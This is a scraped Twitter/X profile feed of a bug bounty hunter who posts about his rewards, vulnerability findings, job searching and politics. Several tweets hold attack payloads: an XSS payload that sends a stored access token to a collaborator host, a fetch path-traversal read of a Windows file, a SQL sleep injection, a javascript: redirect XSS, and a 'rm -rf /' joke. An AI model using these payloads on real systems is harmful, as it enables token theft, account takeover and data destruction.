Soufiane el habti Profile Banner
Soufiane el habti Profile
Soufiane el habti

@wld_basha

Followers
1,638
Following
1,320
Media
195
Statuses
6,667

ان ينصركم الله فلا غالب لكم ## cybersecurity professional

Wanou
Joined July 2017
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@wld_basha
Soufiane el habti
2 years
Alhamdulilah, I earned $15,000 for reported bug on Microsoft bug bounty program
Tweet media one
38
32
666
@wld_basha
Soufiane el habti
2 years
It's happening, I am starting a writeup series, check out the first article about a SSRF finding, many others scheduled to come ;) #bugbountytips #BugBounty
4
82
300
@wld_basha
Soufiane el habti
2 years
<img src=1 onerror=\"const hamid = new XMLHttpRequest();const url='//staging.dude.com @yourburpcollab /posts?test='+localStorage.getItem`accessToken`;console.log(url);('GET',url);hamid.send()\">
5
40
221
@wld_basha
Soufiane el habti
3 years
imma start calling myself a security researcher
Tweet media one
6
6
195
@wld_basha
Soufiane el habti
2 years
Alhamdulilah, I was awarded a $10,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder 3rd order IDOR (many PII disclosed)
13
7
187
@wld_basha
Soufiane el habti
1 year
so basically IDORS paying my bills
Tweet media one
11
7
160
@wld_basha
Soufiane el habti
2 years
Writeups nowadays: 1. tried xss ssrf idor 2. had no luck with many gifs and emojis 3. ohh there's an OTP with 6 digits 4. brute force --> profit $$$$
10
13
134
@wld_basha
Soufiane el habti
2 years
I hope this reach @fbsecurity , two months ago I was scrolling on twitter and I saw this Post when reading it I found out that I reported the exact same thing back in July 2, 2020 when I started BB hunting #bugbounty #bugbountytip 1/N
11
15
107
@wld_basha
Soufiane el habti
4 years
The power of idors after hunting on xss and ssrf for 1 month and got only dupes i hunted on idors for 3 days i got 2 of them valid and unique @InsiderPhD #bugbountytip
Tweet media one
10
6
83
@wld_basha
Soufiane el habti
1 year
"No email verification + Weird session management + IDOR" one of my fun findings in 2023, I was testing an multi-tenant application that assign a subdomain to a company like user1.domain[.]com, at first I noticed that for each subdomain can have users 1/n
5
4
60
@wld_basha
Soufiane el habti
1 year
Attack vector inspired by @spaceraccoonsec
Tweet media one
1
5
60
@wld_basha
Soufiane el habti
2 years
So exited about my latest finding on a desktop app where I went from 0click XSS to accessing system file of any victim (including ATO by stealing token file), with the app restricting file://*. how ? after and got xss I dumped the DOM with XSS hunter, 1/n
3
1
48
@wld_basha
Soufiane el habti
4 years
add this one to your wordlist : /_includes/framer.php juicy blind ssrf via `base` param #bugbountytips #bugbountytip
0
2
46
@wld_basha
Soufiane el habti
2 years
Al hamdulilaah 🙏🙏 lets make it to 1500 #BugBounty
Tweet media one
10
0
45
@wld_basha
Soufiane el habti
4 years
Yay, I was awarded a $250 bounty on @Hacker0x01 ! #TogetherWeHitHarder small bounty for my 22 birthday 😁
3
0
45
@wld_basha
Soufiane el habti
2 years
me each time i choose a program to hack on @Hacker0x01
Tweet media one
5
1
43
@wld_basha
Soufiane el habti
1 year
i've put a SSTI payload ${7*7} in the address then the invoice came, so to exploit i have to wait another week until the invoice come again xD
Tweet media one
4
0
39
@wld_basha
Soufiane el habti
3 years
Alhamdulilah 🙏
Tweet media one
2
0
32
@wld_basha
Soufiane el habti
1 year
i wish i can always have such impact
Tweet media one
4
1
32
@wld_basha
Soufiane el habti
4 years
Yay, I was awarded a $1,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder
1
0
28
@wld_basha
Soufiane el habti
4 years
I am having the perfect signal 😍😍😍😍😍 i used to have 2 😂
Tweet media one
3
0
30
@wld_basha
Soufiane el habti
3 years
user_list?user_name=%27;SELECT%20SLEEP(50); Lhbib ya hbib jib tmer w hlib
3
1
29
@wld_basha
Soufiane el habti
1 year
maybe mayyyybe I have finally my fav bug
Tweet media one
1
0
29
@wld_basha
Soufiane el habti
3 years
👀
Tweet media one
5
1
28
@wld_basha
Soufiane el habti
2 years
Time for multi-billionaire companies stop VDPs and run some real BBP
@qusaialhaddad
Qusai Alhaddad
2 years
LockBit Ransomware Group announced the Bug Bounty Program. "We invite all security researchers, ethical and unethical hackers on the planet to participate in our bug bounty program. The amount of remuneration varies from $1000 to $1 million."
Tweet media one
5
33
194
1
2
27
@wld_basha
Soufiane el habti
10 months
@dorezra2 @WarMonitors Yeah! the girl and the dog by IDF terrorists.
0
1
27
@wld_basha
Soufiane el habti
9 months
sometimes in instance based applications sessions are weird. #bugbountytips #bugbounty
Tweet media one
Tweet media two
2
0
27
@wld_basha
Soufiane el habti
1 year
That's a hospital!!! a damn hospital!! with kids and human beings injured... are we going to just watch this, thats not a conflict or a war between two sides, thats a genocide, and a cleansing
@jacksonhinklle
Jackson Hinkle 🇺🇸
1 year
🇮🇱🇵🇸 The moment Israel BOMBED Gaza’s Baptist Hospital. Over 500 are reported dead. This is a crime against humanity.
6K
53K
99K
0
2
25
@wld_basha
Soufiane el habti
3 years
thank you @huntrdev
1
5
24
@wld_basha
Soufiane el habti
2 years
Xss to local file read 😳😳😳😳 🤏🤏🤏that close to rce gotta work more
1
0
24
@wld_basha
Soufiane el habti
1 year
I guess my first writeup about microsft apps findings will be soon
Tweet media one
1
0
25
@wld_basha
Soufiane el habti
2 years
In July, I submitted 7 vulnerabilities to 4 programs on @Hacker0x01 . #TogetherWeHitHarder
3
1
24
@wld_basha
Soufiane el habti
4 years
7 reports resolved after 4 months of bug bounties (not full time -_-') mainly focusing on understanding how the apps is working #bugbountytip #bugbountytips
Tweet media one
Tweet media two
0
0
24
@wld_basha
Soufiane el habti
1 year
@bxmbn had same case but using google calendar
Tweet media one
Tweet media two
0
5
24
@wld_basha
Soufiane el habti
1 year
MSRC bug 🐛🐛 A month ago I noticed people talking about devtunnels I was so fascinated by the "new ngrok", after poking around for some time. I stumbled on this redirection which send the AAD token for oauth flow 1/n
7
3
24
@wld_basha
Soufiane el habti
10 months
Tweet media one
0
0
20
@wld_basha
Soufiane el habti
3 years
All thanks to @huntrdev they got me $ + CVE 🤩
3
2
22
@wld_basha
Soufiane el habti
3 years
@Samm0uda if you all ever feel dumb one year ago I couldn't exploit same bug
Tweet media one
1
1
21
@wld_basha
Soufiane el habti
2 years
Alhamdulilah, I was awarded a $150 bounty on @Hacker0x01 ! #TogetherWeHitHarder
3
0
21
@wld_basha
Soufiane el habti
2 years
is there a way to see only programs with graphql on @Hacker0x01 @Bugcrowd and @intigriti ? #BugBounty
5
4
20
@wld_basha
Soufiane el habti
4 years
Tweet media one
1
4
20
@wld_basha
Soufiane el habti
4 years
Tweet media one
Tweet media two
0
0
21
@wld_basha
Soufiane el habti
2 years
Happy eid !
2
0
18
@wld_basha
Soufiane el habti
4 years
@orange_8361 when can we see a write up like this one @Hacker0x01
Tweet media one
1
0
19
@wld_basha
Soufiane el habti
1 year
واش خوتنا دياولنا ساكتين حين خايفين على الكان ولا كاس العالم قيمة المسلمين ولات رخيصة 😕
0
1
18
@wld_basha
Soufiane el habti
4 years
@nnwakelam I am studying cybersec at college and they care about is ISO 27000 and 27001 💁🏻
1
0
18
@wld_basha
Soufiane el habti
2 years
Trust me challenging yourself by looking for vulns in hard targets is a good practice, I used to get soo frustrated when not finding vulns on a new private prog then i went for couple of weeks on a prog with thousands of findings didn't a thing, went back to private one
4
0
16
@wld_basha
Soufiane el habti
1 year
So you can send a postmessage from mobile app
Tweet media one
1
2
17
@wld_basha
Soufiane el habti
4 years
thank @alicanact60 for the upvote that was my first valid report on a public program
Tweet media one
2
0
15
@wld_basha
Soufiane el habti
2 years
With couple of good scored bounties, lately I'd love to give part of the credits to @Hacker0x01 for providing some amazing improvement to their plateformes that helped me personally, such as invites based on what you find the most and opportunities and many more.
@wld_basha
Soufiane el habti
2 years
Al hamdulilaah 🙏🙏 lets make it to 1500 #BugBounty
Tweet media one
10
0
45
1
0
16
@wld_basha
Soufiane el habti
4 years
My 2021 bug bounty goal is exploit an http smuggling bug
0
0
12
@wld_basha
Soufiane el habti
4 years
Vibin with the bois @adil_aheyad @Sjlooaud
Tweet media one
3
0
14
@wld_basha
Soufiane el habti
2 years
best part about @intigriti
Tweet media one
1
0
15
@wld_basha
Soufiane el habti
2 years
@Othmane_SAFSAFI Lgbt policy: 🇶🇦 👌
1
0
13
@wld_basha
Soufiane el habti
3 years
Priorities ❤️
Tweet media one
1
0
13
@wld_basha
Soufiane el habti
1 year
Nice We can now get paid for msft bugs from @intigriti
3
0
14
@wld_basha
Soufiane el habti
3 years
@alicanact60 Well this wont work cuz akamai engineers added this payload to their blacklist now 😂
1
0
13
@wld_basha
Soufiane el habti
2 years
damn took an unexpected very long break from hacking
4
0
10
@wld_basha
Soufiane el habti
1 year
@Rhynorater Neat strategy ngl! I always considered bug bounty like getting good at a game (like league of legends), first start with easy champs then go for technical main
1
0
17
@wld_basha
Soufiane el habti
3 years
@BleepinComputer @Ax_Sharma hey mate! i reported same vulnerability back in march 2021 and they closed it as informative and didn't start crying like a baby
Tweet media one
2
0
12
@wld_basha
Soufiane el habti
1 year
@intigriti 15000$ for SSRF from @msftsecresponse
1
0
13
@wld_basha
Soufiane el habti
2 years
POV: we won't answer you
Tweet media one
1
0
13
@wld_basha
Soufiane el habti
3 years
Tweet media one
1
0
12
@wld_basha
Soufiane el habti
2 years
Even the dog is happy #mar #المغرب_بلجيكا
Tweet media one
0
0
12
@wld_basha
Soufiane el habti
3 years
@Samm0uda How they justified paying 500$ for critical (note that their “max bounty “ is 3000~5000) sometimes i start thinking abt quiting but m addicted 🤦🏻💁🏻
Tweet media one
1
0
12
@wld_basha
Soufiane el habti
3 years
@GoogleVRP extend it to 501337 that would be SO LEET
2
0
13
@wld_basha
Soufiane el habti
9 months
مقالي المقبل عن الثغرات سيكون بالعربية انشاءالله اسأل الله التوفيق
2
0
12
@wld_basha
Soufiane el habti
4 years
In January, I submitted 4 vulnerabilities to 2 programs on @Hacker0x01 . #TogetherWeHitHarder
1
0
11
@wld_basha
Soufiane el habti
3 years
@intigriti Rm -rf /
0
0
10
@wld_basha
Soufiane el habti
2 years
My hacking is just so funny : i want to find a 0day -> get a cool bug after hours -> its authenticated -> go back to hunting xss and idors .. repeat
0
1
11
@wld_basha
Soufiane el habti
1 year
can't use backticks, parentheses, document, location, unicode encoding too, any ideas ?
Tweet media one
1
0
10
@wld_basha
Soufiane el habti
4 years
crypto bbp be like :'( i wanna learn crypto #BugBounty
Tweet media one
0
0
8
@wld_basha
Soufiane el habti
4 years
akamai bypass #bugbountytip
Tweet media one
3
1
11
@wld_basha
Soufiane el habti
1 year
@Tachron_ma f case diali f mehdia l kenitra bash nakhd taxi mn dar katjini 80 dh korsa, indrive 30dh, w whd nhar whd mol taxi gals kayqoli duk indrive gha shefara hhhhhhhhhhh
1
0
11
@wld_basha
Soufiane el habti
3 years
2
0
10
@wld_basha
Soufiane el habti
1 year
Who is the owner of this account i wanna contact him
3
0
10
@wld_basha
Soufiane el habti
1 year
@bxmbn Cheap labor as they do in their country
2
0
10
@wld_basha
Soufiane el habti
8 months
Tweet media one
0
0
10
@wld_basha
Soufiane el habti
2 years
the payload went like : Promise.all( fetch('scheme://localhost/cache/../../../../../Windows/LogAdmins.txt').then(x => x.text())).then((sampleResp) => { alert(sampleResp); }); 1/n
2
0
10
@wld_basha
Soufiane el habti
11 months
Tweet media one
1
1
8
@wld_basha
Soufiane el habti
2 years
#infosec community, how do you guys look for remote positions (without relocating to another country ofcrs)? resources, apps ...
0
1
8
@wld_basha
Soufiane el habti
2 years
Got my invite 👀 but passport expired and visa process is sooo slow this days :'(
Tweet media one
1
0
8
@wld_basha
Soufiane el habti
10 months
@Hacker0x01 is this something new ?
Tweet media one
5
0
8
@wld_basha
Soufiane el habti
4 years
Tweet media one
1
0
9
@wld_basha
Soufiane el habti
2 years
Tweet media one
3
0
9
@wld_basha
Soufiane el habti
4 years
@bugraeskici ru = ru + "&dec=1" this gonna be casted to href like if ru = "redir=javascript:alert(1);//" that will trigger a xss
1
2
7
@wld_basha
Soufiane el habti
3 years
Is it common or some companies shutdown an affected server before even triaging your report ? #bugbounty
1
1
8
@wld_basha
Soufiane el habti
2 years
Hey #infosec in middle east, what companies with visa sponsorship in uae? #BugBounty
1
1
7
@wld_basha
Soufiane el habti
1 year
@ChingleeXIII @TheDeenShow that more evidence that christianity and islam calling for same purpose, only issue is christianity got tempered by humains into something that fits their desires and islam remains the same Bi Idni Allah
1
1
8
@wld_basha
Soufiane el habti
3 years
In three weeks lost 8k bounties as dupes 🥲
4
0
8